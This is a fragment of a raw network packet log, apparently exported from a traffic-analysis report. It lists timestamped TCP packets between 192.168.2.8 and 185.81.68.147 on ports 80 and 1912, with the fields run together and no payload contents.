                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519510984 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519644976 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519654036 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519783974 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.519987106 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520068884 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520077944 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520114899 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520124912 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520381927 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520390987 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520400047 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520407915 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520440102 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520448923 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520457029 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520538092 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.520546913 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.544456005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.544497967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.545384884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.545532942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.545543909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.545712948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.546479940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.546490908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.546776056 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.547646999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.547658920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.548022032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.548415899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.548429012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.549272060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.549288988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.550065041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.550184965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.550210953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.550328970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.550676107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.551280975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.551291943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.551438093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.552114964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.552387953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.552500963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.553185940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.553196907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.553543091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.554203987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.554214954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.554641962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.555131912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.555143118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.555339098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.556006908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.556088924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.556529045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.557002068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.557013035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.557169914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.557840109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.558068991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.558718920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.558850050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.559003115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.559755087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.559883118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.559910059 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.560120106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.560787916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.560798883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.560970068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.561743021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.561754942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.562019110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.562611103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.562844992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.563049078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.563599110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.563611031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.563690901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.564766884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.564778090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.564858913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.565443039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.565572977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.565713882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.566382885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.566560984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.566751003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.567361116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.567584038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.567708015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.568389893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.568401098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.568559885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.569297075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.569309950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.569515944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.570310116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.570324898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.571264982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.571284056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.571346998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.571448088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.572192907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.572335958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.572422981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.573050976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.573225021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.573365927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.574099064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.574111938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.574244976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.575016022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.575099945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.727127075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.727139950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.727195978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.727219105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.727372885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.727626085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.728167057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.728219986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.728255987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.729096889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.729197979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.729310036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.730046034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.730257034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.730546951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.731096029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.731146097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.731296062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.732006073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.732040882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.732166052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.732892990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.732933044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.732978106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.733839035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.733954906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.733989954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.734935045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.735260963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.735280991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.735738039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.735892057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.736175060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740855932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740885019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740895987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740906000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740936041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740947008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740957975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740968943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740986109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.740997076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.741139889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.741139889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.741139889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.741277933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.741561890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.741575003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.741740942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.742785931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.743079901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.743995905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.744029999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.744505882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.744587898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.744971037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.744983912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.745682955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.745727062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.746033907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.746593952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.746604919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.746634960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.747222900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.747236013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.747335911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.748611927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.748866081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.748878002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.749020100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.749259949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.749433994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.749463081 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.750488997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.750499964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.750562906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.751076937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.751179934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.751575947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.751918077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.752239943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.752762079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.752993107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.753072023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.753225088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.754111052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.754122972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.754545927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.755141973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.755153894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.755333900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.755948067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.756047964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.756202936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.756951094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.756963968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:13.757095098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930860043 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930860043 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.930883884 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.931005001 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.931085110 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:15.931371927 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.035094023 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.051835060 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.051872015 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.051981926 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.122751951 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.122792959 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.122978926 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.125169992 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.125236988 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.125283957 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.133658886 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.133675098 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.133728981 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.141973972 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.142030954 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.142086029 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.150520086 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.150537014 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.150583029 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.154860020 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.158845901 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.158865929 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.158921003 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.167386055 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.167406082 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.167460918 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.175643921 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.175726891 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.175796032 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.184042931 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.184170008 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.184242964 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.192516088 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.192647934 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.192708015 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.200974941 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.201109886 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.201170921 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.244354010 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.244373083 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.244443893 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.248327971 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.301027060 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.315001011 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.315042973 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.315095901 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.317482948 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.317578077 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.317617893 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.322319984 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.324237108 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.324306011 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.324364901 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.329052925 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.329071045 CET8049714185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.329122066 CET4971480192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:16.334052086 CET8049714185.81.68.147192.168.2.8
